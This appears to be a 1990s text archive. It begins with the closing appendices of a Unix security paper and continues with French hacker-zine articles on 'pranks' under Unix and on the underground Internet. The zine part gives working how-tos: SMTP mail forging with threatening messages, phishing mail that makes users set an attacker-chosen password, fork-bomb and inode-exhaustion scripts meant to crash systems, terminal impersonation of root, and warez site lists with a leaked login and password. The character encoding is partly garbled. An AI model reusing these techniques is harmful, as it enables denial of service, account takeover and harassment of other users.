sites, simply because the system administrators don't know any better --
|
|||
|
they aren't stupid or slow, they simply are unable to spend the very
|
|||
|
little free time that they have to explore all of the security issues
|
|||
|
that pertain to their systems. Combine that with no easy access to this
|
|||
|
sort of information and you have poorly defended systems. We (modestly)
|
|||
|
hope that this paper will provide badly-needed data on how systems are
|
|||
|
broken into, and further, to explain _why_ certain steps should be taken
|
|||
|
to secure a system. Knowing why something is a problem is, in our
|
|||
|
opinion, the real key to learning and to making an informed, intelligent
|
|||
|
choice as to what security really means for your site.
|
|||
|
|
|||
|
----
|
|||
|
|
|||
|
Appendix A:
|
|||
|
|
|||
|
SATAN (Security Analysis Tool for Auditing Networks)
|
|||
|
|
|||
|
Originally conceived some years ago, SATAN is actually the prototype of
|
|||
|
a much larger and more comprehensive vision of a security tool. In its
|
|||
|
current incarnation, SATAN remotely probes and reports various bugs and
|
|||
|
weaknesses in network services and windowing systems, as well as
|
|||
|
detailing as much generally useful information as possible about the
|
|||
|
target(s). It then processes the data with a crude filter and what
|
|||
|
might be termed an expert system to generate the final security
|
|||
|
analysis. While not particularly fast, it is extremely modular and easy
|
|||
|
to modify.
|
|||
|
|
|||
|
SATAN consists of several sub-programs, each of which is an executable
|
|||
|
file (perl, shell, compiled C binary, whatever) that tests a host for a
|
|||
|
given potential weakness. Adding further test programs is as simple as
|
|||
|
putting an executable into the main directory with the extension ".sat";
|
|||
|
the driver program will automatically execute it. The driver generates
|
|||
|
a set of targets (using DNS and a fast version of ping together to get
|
|||
|
"live" targets), and then executes each of the programs over each of the
|
|||
|
targets. A data filtering/interpreting program then analyzes the
|
|||
|
output, and lastly a reporting program digests everything into a more
|
|||
|
readable format.
|
|||
|
|
|||
|
The entire package, including source code and documentation, will be
|
|||
|
made freely available to the public, via anonymous ftp and by posting it
|
|||
|
to one of the numerous source code groups on the Usenet.
|
|||
|
|
|||
|
----
|
|||
|
|
|||
|
Appendix B:
|
|||
|
|
|||
|
An informal survey conducted on about a dozen Internet sites
|
|||
|
(educational, military, and commercial, with over 200 hosts and 40000
|
|||
|
accounts) revealed that on the average, close to 10 percent of a site's
|
|||
|
accounts had .rhosts files. These files averaged six trusted hosts
|
|||
|
each; however, it was not uncommon to have well over one hundred entries
|
|||
|
in an account's .rhosts file, and on a few occasions, the number was
|
|||
|
over five hundred! (This is not a record one should be proud of
|
|||
|
owning.) In addition, _every_ site directly on the internet (one site
|
|||
|
was mostly behind a firewall) trusted a user or host at another site --
|
|||
|
thus, the security of the site was not under the system administrators
|
|||
|
direct control. The larger sites, with more users and hosts, had a
|
|||
|
lower percentage of users with .rhosts files, but the size of .rhosts
|
|||
|
files increased, as well as the number of trusted off-site hosts.
|
|||
|
|
|||
|
Although it was very difficult to verify how many of the entries were
|
|||
|
valid, with such hostnames such as "Makefile", "Message-Id:", and
|
|||
|
"^Cs^A^C^M^Ci^C^MpNu^L^Z^O", as well as quite a few wildcard entries, we
|
|||
|
question the wisdom of putting a site's security in the hands of its
|
|||
|
users. Many users (especially the ones with larger .rhosts files)
|
|||
|
attempted to put shell-style comments in their .rhosts files, which most
|
|||
|
UNIX systems attempt to resolve as valid host names. Unfortunately, an
|
|||
|
attacker can then use the DNS and NIS hostname spoofing techniques
|
|||
|
discussed earlier to set their hostname to "#" and freely log in. This
|
|||
|
puts a great many sites at risk (at least one major vendor ships their
|
|||
|
systems with comments in their /etc/hosts.equiv files.)
|
|||
|
|
|||
|
You might think that these sites were not typical, and, as a matter of
|
|||
|
fact, they weren't. Virtually all of the administrators knew a great
|
|||
|
deal about security and write security programs for a hobby or
|
|||
|
profession, and many of the sites that they worked for did either
|
|||
|
security research or created security products. We can only guess at
|
|||
|
what a "typical" site might look like.
|
|||
|
|
|||
|
----
|
|||
|
|
|||
|
Appendix C:
|
|||
|
|
|||
|
After receiving mail from a site that had been broken into from one of
|
|||
|
our systems, an investigation was started. In time, we found that the
|
|||
|
intruder was working from a list of ".com" (commercial) sites, looking
|
|||
|
for hosts with easy-to steal password files. In this case,
|
|||
|
"easy-to-steal" referred to sites with a guessable NIS domainname and an
|
|||
|
accessible NIS server. Not knowing how far the intruder had gotten, it
|
|||
|
looked like a good idea to warn the sites that were in fact vulnerable
|
|||
|
to password file theft. Of the 656 hosts in the intruder's hit list, 24
|
|||
|
had easy-to-steal password files -- about one in twenty-five hosts! One
|
|||
|
third of these files contained at least one password-less account with
|
|||
|
an interactive shell. With a grand total of 1594 password-file entries,
|
|||
|
a ten-minute run of a publically-available password cracker (Crack)
|
|||
|
revealed more than 50 passwords, using nothing but a low-end Sun
|
|||
|
workstation. Another 40 passwords were found within the next 20
|
|||
|
minutes; and a root password was found in just over an hour. The result
|
|||
|
after a few days of cracking: five root passwords found, 19 out of 24
|
|||
|
password files (eighty percent) with at least one known password, and
|
|||
|
259 of 1594 (one in six) passwords guessed.
|
|||
|
|
|||
|
----
|
|||
|
|
|||
|
Appendix D:
|
|||
|
|
|||
|
How to get some free security resources on the Internet
|
|||
|
|
|||
|
Mailing lists:
|
|||
|
|
|||
|
o The CERT (Computer Emergency Response Team) advisory mailing list.
|
|||
|
Send e-mail to cert@cert.org, and ask to be placed on their mailing
|
|||
|
list.
|
|||
|
|
|||
|
o The Phrack newsletter. Send an e-mail message to
|
|||
|
phrack@well.sf.ca.us and ask to be added to the list.
|
|||
|
|
|||
|
o The Firewalls mailing list. Send the following line to
|
|||
|
majordomo@greatcircle.com:
|
|||
|
|
|||
|
subscribe firewalls
|
|||
|
|
|||
|
o Computer Underground Digest. Send e-mail to
|
|||
|
tk0jut2@mvs.cso.niu.edu, asking to be placed on the list.
|
|||
|
|
|||
|
Free Software:
|
|||
|
|
|||
|
COPS (Computer Oracle and Password System) is available via anonymous
|
|||
|
ftp from archive.cis.ohio-state.edu, in pub/cops/1.04+.
|
|||
|
|
|||
|
The tcp wrappers are available via anonymous ftp from ftp.win.tue.nl,
|
|||
|
in pub/security.
|
|||
|
|
|||
|
The latest version of berkeley sendmail is available via anonymous ftp
|
|||
|
from ftp.cs.berkeley.edu, in ucb/sendmail.
|
|||
|
|
|||
|
Sources for ftpd and many other network utilities can be found in
|
|||
|
ftp.uu.net, in packages/bsd-sources.
|
|||
|
|
|||
|
Source for ISS (Internet Security Scanner), a tool that remotely scans
|
|||
|
for various network vulnerabilities, is available via anonymous ftp from
|
|||
|
ftp.uu.net, in usenet/comp.sources.misc/volume40/iss.
|
|||
|
|
|||
|
Securelib is available via anonymous ftp from ftp.uu.net, in
|
|||
|
usenet/comp.sources.misc/volume36/securelib.
|
|||
|
|
|||
|
----
|
|||
|
|
|||
|
Bibliography:
|
|||
|
|
|||
|
Baldwin, Robert W., Rule Based Analysis of Computer Security,
|
|||
|
Massachusetts Institute of Technology, June 1987.
|
|||
|
|
|||
|
Bellovin, Steve, Using the Domain Name System for System Break-ins,
|
|||
|
1992 (unpublished).
|
|||
|
|
|||
|
Massachusetts Institute of Technology, X Window System Protocol,
|
|||
|
Version 11, 1990.
|
|||
|
|
|||
|
Shimomura, Tsutomu, private communication.
|
|||
|
|
|||
|
Sun Microsystems, OpenWindows V3.0.1 User Commands, March 1992.
|
|||
|
|
|||
|
----
|
|||
|
|
|||
|
Suggested reading:
|
|||
|
|
|||
|
Bellovin, Steve -- "Security Problms in the TCP/IP Protocol Suite",
|
|||
|
Computer Communication Review 19 (2), 1989; a comment by Stephen
|
|||
|
Kent appears in volume 19 (3), 1989.
|
|||
|
|
|||
|
Garfinkle, Simson and Spafford, Gene, "Practical UNIX Security",
|
|||
|
O'Reilly and Associates, Inc., 1992.
|
|||
|
|
|||
|
Hess, David, Safford, David, and Pooch, Udo, "A UNIX Network Protocol
|
|||
|
Study: Network Information Service", Computer Communication Review
|
|||
|
22 (5) 1992.
|
|||
|
|
|||
|
Phreak Accident, Playing Hide and Seek, UNIX style, Phrack, Volume
|
|||
|
Four, Issue Forty-Three, File 14 of 27.
|
|||
|
|
|||
|
Ranum, Marcus, "Firewalls" internet electronic mailing list, Sept
|
|||
|
1993.
|
|||
|
|
|||
|
Schuba, Christoph, "Addressing Weaknesses in the Domain Name System
|
|||
|
Protocal", Purdue University, August 1993.
|
|||
|
|
|||
|
Thompson, Ken, Reflections on Trusting Trust, Communications of the ACM
|
|||
|
27 (8), 1984.
|
|||
|
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.12
|
|||
|
|
|||
|
o/~ Paranoia ! o/~ Paranoia o/~
|
|||
|
---===***###> Plaisanter sous Unix <###***===---
|
|||
|
o/~ They are Back ! o/~
|
|||
|
|
|||
|
Vous vous etes toujours demand<6E> comment jouer des farces sous Unix,
|
|||
|
comment foutres les boules a vos potes, a votre administrateur, jouer au con
|
|||
|
avec le psyche des autres, faire du SEAO? Eh bien voila le but de cet autre
|
|||
|
petit ++N-Phile. Amusez vous bien !
|
|||
|
|
|||
|
[ nota : tout ce qui est tap<61> au clavier est pr<70>c<EFBFBD>d<EFBFBD> de ">>>" ]
|
|||
|
|
|||
|
> Mailer sous un autre nom:
|
|||
|
========================
|
|||
|
Pour cela, il faut connaitre les bases du transfer de mail. Le mail sous Unix
|
|||
|
est transporte de machine en machine par "sendmail" qui <20>coute les messages des
|
|||
|
autres mailers ou de ses clients sur le port TCP num<75>ro 25.
|
|||
|
|
|||
|
DaubeNet {101} grep smtp /etc/services
|
|||
|
smtp 25/tcp mail
|
|||
|
|
|||
|
Donc il suffit de se connecter la bas et de respecter le protocole SMTP
|
|||
|
(Simple Message Transfer Protocol) plus une petite astuce pour faire un faux
|
|||
|
mail qui pourrait venir de n'importe ou.
|
|||
|
|
|||
|
----------------------
|
|||
|
DaubeNet {102} >>> telnet localhost 25
|
|||
|
Trying 127.0.0.1...
|
|||
|
Connected to univ-anon.fr.
|
|||
|
Escape character is '^]'.
|
|||
|
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:51:55 -0600
|
|||
|
220 ESMTP spoken here
|
|||
|
>>>help
|
|||
|
214-Commands:
|
|||
|
214- HELO EHLO MAIL RCPT DATA
|
|||
|
214- RSET NOOP QUIT HELP VRFY
|
|||
|
214- EXPN VERB
|
|||
|
214-For more info use "HELP <topic>".
|
|||
|
214-To report bugs in the implementation send email to
|
|||
|
214- sendmail@CS.Berkeley.EDU.
|
|||
|
214-For local information send email to Postmaster at your site.
|
|||
|
214 End of HELP info
|
|||
|
>>>help helo
|
|||
|
214-HELO <hostname>
|
|||
|
214- Introduce yourself.
|
|||
|
214 End of HELP info
|
|||
|
>>>help mail
|
|||
|
214-MAIL FROM: <sender>
|
|||
|
214- Specifies the sender.
|
|||
|
214 End of HELP info
|
|||
|
>>>help rcpt
|
|||
|
214-RCPT TO: <recipient>
|
|||
|
214- Specifies the recipient. Can be used any number of times.
|
|||
|
214 End of HELP info
|
|||
|
>>>help data
|
|||
|
214-DATA
|
|||
|
214- Following text is collected as the message.
|
|||
|
214- End with a single dot.
|
|||
|
214 End of HELP info
|
|||
|
>>>help quit
|
|||
|
214-QUIT
|
|||
|
214- Exit sendmail (SMTP).
|
|||
|
214 End of HELP info
|
|||
|
>>>quit
|
|||
|
221 DaubeNet closing connection
|
|||
|
Connection closed by foreign host.
|
|||
|
----------------------
|
|||
|
|
|||
|
Voila dans l'ordre les syntaxe des commandes que l'on va utiliser poru forger
|
|||
|
un mail. C'est tr<74>s facile mais il y a une bidouille qu'il faut connaitre et
|
|||
|
qui vous trahi si vous ne la connaissez pas.
|
|||
|
|
|||
|
----------------------
|
|||
|
DaubeNet {103} >>> telnet localhost 25
|
|||
|
Trying 127.0.0.1...
|
|||
|
Connected to univ-anon.fr.
|
|||
|
Escape character is '^]'.
|
|||
|
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:52:53 -0600
|
|||
|
220 ESMTP spoken here
|
|||
|
>>>helo ducon.fbi.com
|
|||
|
250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you
|
|||
|
>>>mail from: root@ducon.fbi.com
|
|||
|
250 root@ducon.fbi.com... Sender ok
|
|||
|
>>>rcpt to: fred
|
|||
|
250 fred... Recipient ok
|
|||
|
>>>data
|
|||
|
354 Enter mail, end with "." on a line by itself
|
|||
|
>>>
|
|||
|
>>>Please, would you stop playing with my Unix system otherwise i'll
|
|||
|
>>>send a wet operation commando to your university.
|
|||
|
>>>
|
|||
|
>>>Nigel X.
|
|||
|
>>>System Administrator at FBI Inc.
|
|||
|
>>>root@fbi.com
|
|||
|
>>>.
|
|||
|
250 DAA00299 Message accepted for delivery
|
|||
|
>>>quit
|
|||
|
221 DaubeNet closing connection
|
|||
|
Connection closed by foreign host.
|
|||
|
----------------------
|
|||
|
|
|||
|
Haha, ca y est, on a envoy<6F> notre petite bidouille et le mec va avoir les
|
|||
|
jetons de sa vie:
|
|||
|
|
|||
|
----------------------
|
|||
|
DaubeNet {104} >>> mail
|
|||
|
Mail version 5.5 6/1/90. Type ? for help.
|
|||
|
"/var/mail/fred": 1 message 1 new
|
|||
|
>N 1 root@ducon.fbi.com Thu Sep 15 03:55 14/508
|
|||
|
& >>>1
|
|||
|
Message 1:
|
|||
|
From root@ducon.fbi.com Thu Sep 15 03:55:03 1994
|
|||
|
From: root@ducon.fbi.com
|
|||
|
Apparently-To: fred [ * ]
|
|||
|
|
|||
|
Please, would you stop playing with my Unix system otherwise i'll
|
|||
|
send a wet operation commando to your university.
|
|||
|
|
|||
|
Nigel X.
|
|||
|
System Administrator at FBI Inc.
|
|||
|
root@fbi.com
|
|||
|
|
|||
|
& >>>d
|
|||
|
& >>>q
|
|||
|
----------------------
|
|||
|
|
|||
|
Arghh... Vous avez vu comme moi la ligne ou j'ai mis une ast<73>risque entre
|
|||
|
crochets : C'est marqu<71>: "Apparently-To: " arghhh... Ca fait vraiment pas
|
|||
|
serieux n'est ce pas?
|
|||
|
C'est ce qui vous trahi quand vous ne connaissez pas la bidouille.
|
|||
|
Et en parlant de bidouille, la voici...
|
|||
|
|
|||
|
----------------------
|
|||
|
DaubeNet {105} >>> telnet localhost 25
|
|||
|
Trying 127.0.0.1...
|
|||
|
Connected to univ-anon.fr.
|
|||
|
Escape character is '^]'.
|
|||
|
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:55:43 -0600
|
|||
|
220 ESMTP spoken here
|
|||
|
>>>helo
|
|||
|
250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you
|
|||
|
>>>mail from: root@fbi.com
|
|||
|
250 root@fbi.com... Sender ok
|
|||
|
>>>rcpt to: fred
|
|||
|
250 fred... Recipient ok
|
|||
|
>>>data
|
|||
|
354 Enter mail, end with "." on a line by itself
|
|||
|
>>>To: fred@univ-anon.fr [ * ]
|
|||
|
>>>
|
|||
|
>>>Good afternoon,
|
|||
|
>>>
|
|||
|
>>> Could you please stop playing with my unix system otherwise i'll
|
|||
|
>>>be forced to send one of our wet operations' commando to execute you.
|
|||
|
>>>
|
|||
|
>>>Nigel X, System Administrator at Fbi Inc.
|
|||
|
>>>.
|
|||
|
250 DAA00307 Message accepted for delivery
|
|||
|
>>>quit
|
|||
|
221 DaubeNet closing connection
|
|||
|
Connection closed by foreign host.
|
|||
|
----------------------
|
|||
|
|
|||
|
Vous regarderez attentivement la premiere ligne tap<61>e apr<70>s le DATA.
|
|||
|
C'est un "To: " suivi de l'adresse a qui on envoie...
|
|||
|
Et voila le r<>sultat:
|
|||
|
|
|||
|
----------------------
|
|||
|
DaubeNet {106} >>> mail
|
|||
|
Mail version 5.5 6/1/90. Type ? for help.
|
|||
|
"/var/mail/fred": 1 message 1 new
|
|||
|
>N 1 root@fbi.com Thu Sep 15 03:57 14/509
|
|||
|
& >>>1
|
|||
|
Message 1:
|
|||
|
From root@fbi.com Thu Sep 15 03:57:41 1994
|
|||
|
From: root@fbi.com
|
|||
|
To: fred@univ-anon.fr
|
|||
|
|
|||
|
Good afternoon,
|
|||
|
|
|||
|
Could you please stop playing with my unix system otherwise i'll
|
|||
|
be forced to send one of our wet operations' commando to execute you.
|
|||
|
|
|||
|
Nigel X, System Administrator at Fbi Inc.
|
|||
|
|
|||
|
& >>>d
|
|||
|
& >>>q
|
|||
|
DaubeNet {107} exit
|
|||
|
----------------------
|
|||
|
|
|||
|
C'est beau non la technique... ;)
|
|||
|
|
|||
|
Grace <20> cela vous pouvez commencer <20> lancer la terreur sur votre r<>seau.
|
|||
|
|
|||
|
Hacking Psychology:
|
|||
|
==================
|
|||
|
Les utilisateurs sont par d<>finition tr<74>s soumis (et c'est pour cela
|
|||
|
que l'on distingue les hackers, ils refusent cette soumission.) Pour un user
|
|||
|
lambda, tout ce qui vient du Mail est vrais, sacre et tout alors que n'importe
|
|||
|
qui peut faire du faux mail...
|
|||
|
|
|||
|
Bien sur, on peut faire des mail bombs de 800 kilo octets qui vont
|
|||
|
completement flooder toute la boite aux lettre de votre/vos victime(s).
|
|||
|
|
|||
|
Mais il y a plus interressant.
|
|||
|
Imaginez que quelqu'un recoive un message de: security-daemon@<votre site>
|
|||
|
disant:
|
|||
|
-----
|
|||
|
* This is and automated mailing : don't reply *
|
|||
|
|
|||
|
We have found that your password is insecure. You should change this
|
|||
|
otherwise your account will be disabled.
|
|||
|
|
|||
|
Please use the password "ItG-4v3" instead.
|
|||
|
|
|||
|
Thank you.
|
|||
|
Security Daemon.
|
|||
|
-----
|
|||
|
Ainsi, vous pouvez donner beaucoup de passwords et ainsi controller pas mal de
|
|||
|
comptes. Une fois, j'ai r<>ussi m<>me <20> faire changer le mot de passe de
|
|||
|
*l'admin* !!!!! Quel con, il ob<6F>it <20> des packages de s<>curit<69> qu'il n'a m<>me
|
|||
|
pas install<6C>. AHahaha !
|
|||
|
|
|||
|
Foutre un systeme sur les genoux:
|
|||
|
================================
|
|||
|
Pour cela il y a des petits trucs tout con <20> faire si vous n'avez pas
|
|||
|
d'accounting:
|
|||
|
cr<EFBFBD>ez un petit script "toto" de ce type:
|
|||
|
#!/bin/sh
|
|||
|
mkdir ./-fuck
|
|||
|
cp ./toto ./-fuck/toto
|
|||
|
cd ./-fuck
|
|||
|
./toto
|
|||
|
|
|||
|
Hehe, le truc va faire de plus en plus de directory et la machine s'arretera
|
|||
|
par manque d'inode.
|
|||
|
|
|||
|
On peut aussi faire dans le meme genre un fichier "foo":
|
|||
|
#!/bin/csh
|
|||
|
./foo &
|
|||
|
./foo &
|
|||
|
./foo &
|
|||
|
|
|||
|
hehe, effet tout aussi garanti...
|
|||
|
|
|||
|
On peut m<>me mixer les deux !
|
|||
|
|
|||
|
Les messages fantomes:
|
|||
|
=====================
|
|||
|
Vous savez, quand vous faites un write la personne <20> qui il est d<>stin<69>
|
|||
|
recoit:
|
|||
|
Message from <luser> at/...
|
|||
|
Ca serait marrant si vous pouviez vous faire passer pour d'autres personnes
|
|||
|
non??
|
|||
|
Eh bien c'est possible:
|
|||
|
Il faut savoir comment ca marche. Chaque utilisateur logg<67> a au moins un
|
|||
|
terminal. Ce terminal est repr<70>sent<6E> dans le syst<73>me Unix comme un nom de
|
|||
|
p<EFBFBD>riph<EFBFBD>rique du type: /dev/ttyXX ou XX est g<>n<EFBFBD>ralement un nombre ou une lettre
|
|||
|
et un nombre.
|
|||
|
Bref, c'est la dessus qu'<27>crit la commande write.
|
|||
|
Le "msg on" ou "msg off" que l'on tape modifie simplement la protection en
|
|||
|
<EFBFBD>criture sur ce p<>riph<70>rique. Sur les anciens syst<73>me, l'appel syst<73>me
|
|||
|
vhangup() n'<27>xistait pas et on pouvait donc se connecter, regarder les
|
|||
|
terminaux disponibles (nons attribu<62>s <20> des users donc en lecture et ecriture
|
|||
|
pour tout le monde) et faire un cat dessus comme ceci:
|
|||
|
$ cat >/dev/tty02
|
|||
|
ensuite faire un control-Z pour le stopper et attendre que quelqu'un se logge
|
|||
|
par ce terminal.
|
|||
|
Ensuite, pr<70>parer a cot<6F> le :
|
|||
|
|
|||
|
Message from root at...
|
|||
|
Veuillez changer imm<6D>diatement votre mot de passe en: "TuY5;tK"
|
|||
|
Merci. Votre administrateur syst<73>me.
|
|||
|
<EOT>
|
|||
|
|
|||
|
Fun isn't it?
|
|||
|
|
|||
|
S'amuser avec les <20>mulateurs de terminaux:
|
|||
|
=========================================
|
|||
|
Vous savez que par exemple zmodem envoie une chaine de caract<63>re qui
|
|||
|
lance automatiquement Zmodem en reception du cote de l'<27>mulateur de terminaux.
|
|||
|
C'est tr<74>s interressant car on peut faire appeler intempestivement Zmodem dans
|
|||
|
l'<27>mulateur si telle ou telle personne en message on utilise un <20>mulateur de
|
|||
|
terminaux.
|
|||
|
|
|||
|
Il suffit d'enregistrer la s<>quence envoy<6F>e par Zmodem pour d<>clancher l'appel
|
|||
|
de Zmodem et hop, bienvenue en enfer !
|
|||
|
|
|||
|
Un petit programe fait cela entre autre dans les sessions Talk, c'est flash2.c
|
|||
|
et son ancetre qui ne le fait pas mais est sympa: flash.c.
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.13
|
|||
|
|
|||
|
|
|||
|
^^^^^^^^^^^^^^^^^^^^^^^^^
|
|||
|
>>>>>>>> du cote <<<<<<<<
|
|||
|
======= d'internet ======
|
|||
|
vvvvvvvvvvvvvvvvvvvvvvvvv
|
|||
|
|
|||
|
Chez les internetiens, ca a boug<75> sacrement, apres les emmerde de Philip
|
|||
|
Zimmerman accus<75> par la NSA et la CIA d'avoir export<72> un logiciel de
|
|||
|
cryptographie (PGP) les hackers se sont mis a remuer sec.
|
|||
|
Le probleme de PGP a <20>t<EFBFBD> r<>solu, la version 2.5 est interdite <20> l'export
|
|||
|
mais la 2.6 est okay et exportable !
|
|||
|
STICK WITH 2.5, IT'S THE MOST SECURE!
|
|||
|
|
|||
|
Les experts en s<>curit<69> d'une grosse agence francaise ont d<>clar<61> recemment:
|
|||
|
"On leur a bien fait la nique"...
|
|||
|
|
|||
|
J'ai bien peur que la plus grosse "nique" ce soit nous qui la faisions
|
|||
|
prochainnement. En effet, beaucoup de jeunes hackers se sont lanc<6E>s a fond
|
|||
|
dans le hack professionel.
|
|||
|
|
|||
|
Grace <20> des listes de diffusions comme 8lgm et bugtraq, ils ont acqui un
|
|||
|
savoir faire impressionant. A suivre...
|
|||
|
|
|||
|
| Underground sites |
|
|||
|
|
|||
|
Sur Internet, il y a des serveurs FTP ou FSP qui h<>bergent sans le
|
|||
|
savoir des sanctuaires du hacking ou de la scene 0-day warez.
|
|||
|
Voici une petite liste qui a <20>t<EFBFBD> r<>cuper<65>e aux USA:
|
|||
|
============
|
|||
|
----++++ Betaz List ++++----
|
|||
|
-= These sites are up 9.05.94 =-
|
|||
|
------------------------------------------------------------------------------
|
|||
|
FTP
|
|||
|
~~~
|
|||
|
sy2000.cet.fsu.edu /incoming/msdos/.<tab>/.^l^k pc|mac|fast
|
|||
|
cs.uidaho.edu /pub/incoming/MacPGP/"<tab><tab>" pc|mac
|
|||
|
130.246.23.9 /pub/others/".. "/".. " pc|mac
|
|||
|
130.246.17.54 /pub/".. "/".cache " " "
|
|||
|
brinta.ptf.hro.nl ** Private **
|
|||
|
160.78.31.26 /incoming/".. " pc
|
|||
|
ic16.ee.umanitoba.ca /pub/PSCAD_RTDS/incoming/te few
|
|||
|
acme.fred.org /pub/msdos/Tmp/^X few
|
|||
|
|
|||
|
Console
|
|||
|
~~~~~~~
|
|||
|
syr.edu /software/unix/kip/dpf snes|sega
|
|||
|
131.215.46.20 1717 snesapalooza
|
|||
|
|
|||
|
To add to or recieve an updated list
|
|||
|
mail an112452 or msg betaz on irc
|
|||
|
============
|
|||
|
Voila, donc vous pouvez aller y faire des tours, c'est pas mal.
|
|||
|
Ce sont des warez en general de bonne qualit<69>.
|
|||
|
|
|||
|
Et voila une autre liste:
|
|||
|
============
|
|||
|
FDISK and FERN's Warez List 9:09PM 8/24/94 Atlantic FDISK V5.6
|
|||
|
All of the sites have been test as of the date and time above
|
|||
|
|
|||
|
FTP
|
|||
|
Site Dir Submitted By
|
|||
|
--------------------------------------------------------------------
|
|||
|
corto.inria.fr /broadcast/^K^E^F^E^L Skippy
|
|||
|
tiger.vut.edu.au login:r9202044 Pass:Daavee ".. "
|
|||
|
192.54.41.33 /pub/avs_mirror/pub/siggraph/uploads/"..." cc
|
|||
|
acme.fred.org /pub/msdos/tmp/".. " swazi
|
|||
|
130.246.23.9 /pub/others Hi-Fi
|
|||
|
|
|||
|
Site Port Submitted By
|
|||
|
--------------------------------------------------------------------
|
|||
|
130.161.39.3 5300 Wowzer
|
|||
|
128.206.29.11 12321 Bryer
|
|||
|
158.132.79.228 1997 casey(anon 10285)
|
|||
|
============
|
|||
|
|
|||
|
| IRC |
|
|||
|
|
|||
|
Vous connaissez IRC? L'Internet Relay Chat... C'est le havre dans
|
|||
|
lequel tous les internet junkies viennent discuter de n'importe quoi.
|
|||
|
|
|||
|
Un des "channel" les plus virulent est #hack (suivi de pres par #warez et
|
|||
|
#phreak). La dedans se livre une petite guerre permanente <20> qui aura les
|
|||
|
droits operateurs sur le channel, pour cela, nous avons recours <20> des outils
|
|||
|
assez rigolos. Tout d'abord, chaque bon hacker qui se respecte a sa propre
|
|||
|
armure personnelle le protegeant des divers Tsunamis ou Rolling Bombs qui ne
|
|||
|
sont que des attaques software destin<69>es <20> virer quelqu'un du channel.
|
|||
|
Les plus connus de ces logiciels sont GargOyle et Serpent de Vassago, personnage
|
|||
|
tres controvers<72> sur Internet.
|
|||
|
(gargoyle.tar.Z, serpent.tar.Z, ircdfens.tar.Z, util662.tar.Z, textbox.tar.Z)
|
|||
|
Ensuite vient le hack hard qui passe souvent par l'arret de serveur IRC
|
|||
|
isolant un connecte de l'ensemble des autres connecte et qui donne ainsi les
|
|||
|
chanops (channel operators) au connecte isole.
|
|||
|
Fun isn't it?
|
|||
|
|
|||
|
La pluspart du temps vous ne trouverez personne d'interessant au premier abord
|
|||
|
sur #hack. Mais de nombreuses personnes interressantes y passent souvent.
|
|||
|
Donc la premiere impression de conneries inutiles n'est pas forcemment vraie
|
|||
|
pour tout le monde.
|
|||
|
|
|||
|
Comment se connecter sur IRC?
|
|||
|
- - - - - - - - - - - - - - -
|
|||
|
Eh bien tout d'abord il vous faut un client IRC que vous compilerez
|
|||
|
pour votre unix (si vous avez un PC sous SLIP et PPP, il vous faudra chercher
|
|||
|
un client IRC pour PC). Ensuite, vous devrez trouver un serveur IRC qui
|
|||
|
marche dans votre coins (pas trop loin dans le reseau) et qui vous accepte en
|
|||
|
tant que connecte. Si vous prenez un serveur irc trop loin (comptez la
|
|||
|
"distance" avec traceroute), vous aurez des delais dans votre dialogue.
|
|||
|
Il vous faut aussi et bien sur un acces Internet.
|
|||
|
Une fois que vous aurez fix<69> tout cela, vous pourrez vous connecter sur IRC.
|
|||
|
|
|||
|
Comment utiliser?
|
|||
|
- - - - - - - - -
|
|||
|
Les commandes IRC sont assez simple. Je vous conseille de prendre un
|
|||
|
client IRC II car ils permettent vraiment des choses tres cool. Ils vous
|
|||
|
permettent par exemple de faire du transfert de fichier avec quelqu'un en
|
|||
|
restant connecte sur le chat et en continuant de discuter.
|
|||
|
On change son nickname (pseudo) avec: /NICK <nouveau nickname>
|
|||
|
On va dans un channel en faisant: /join #<nom du channel>
|
|||
|
Les noms de channels commencent toujours par #
|
|||
|
On quitte un channel en faisait: /leave <channel>
|
|||
|
On sort du client en faisant: /exit
|
|||
|
On envoie un message prive non securise <20> quelqu'un: /msg <nickname> <message>
|
|||
|
On regarde qui il y a dans le channel avec: /who #<channel>
|
|||
|
voila les commandes de base.
|
|||
|
|
|||
|
Explication du fonctionnement du reseau IRC.
|
|||
|
- - - - - - - - - - - - - - - - - - - - - -
|
|||
|
On utilise l'IRC avec un client qui se connecte <20> un serveur IRC.
|
|||
|
Ce serveur IRC est connecte <20> d'autres serveurs IRC. Ainsi, il y a un traffic
|
|||
|
moins important car l'information est distribuee sur les serveurs IRC. Si
|
|||
|
chacun choisit un serveur IRC proche de chez lui (pas beaucoup de internet hop,
|
|||
|
les saut de puces que l'on voit avec traceroute), les liaisons internationales
|
|||
|
ne seront utilis<69>es que par les serveurs et donc pas de gaspillage!
|
|||
|
|
|||
|
Ainsi on aura:
|
|||
|
Client Client Client
|
|||
|
Client__ | `\ |
|
|||
|
`\ | `\ |
|
|||
|
`\ | `\ |
|
|||
|
Client----IrcServ3==========IrcServ4=====IrcServ5-----Client
|
|||
|
|| \
|
|||
|
|| \
|
|||
|
|| \
|
|||
|
Client----IrcServ2==========IrcServ1 Client
|
|||
|
| |
|
|||
|
| |
|
|||
|
Client Client
|
|||
|
|
|||
|
Si il y une coupure reseau entre IrcServ1 et IrcServ2 le user connecte sur
|
|||
|
IrcServ1 n'aura plus qu'a quitter et revenir dans le channel en question et
|
|||
|
des a present il aura les chanops sur le reseau car IrcServ1 croit alors qu'il
|
|||
|
est tout seul dans le reseau puisqu'il ne voit pas les autres au dela de la
|
|||
|
coupure reseau (que l'on appelle netsplit).
|
|||
|
Ainsi, des que la connection entre IrcServ 1 et 2 reviendra, le Client de
|
|||
|
IrcServ 1 sera chanop et le restera : il sera devenu chanops.
|
|||
|
Donc le jeu est pour certain de devenir chanop et de faire "tomber" la liaison
|
|||
|
entre son serveur local et le serveur qui fournit le feed IRC a son serveur
|
|||
|
local. Je sais, c'est vicieux mais a la fin ca n'a plus d'interet tant c'est
|
|||
|
commun sur Irc.
|
|||
|
|
|||
|
Au niveau des chanops, il faut savoir que le premier qui se connecte
|
|||
|
dans un channel deviens automatiquement le maitre du channel avec ses chanops.
|
|||
|
Il peut ainsi:
|
|||
|
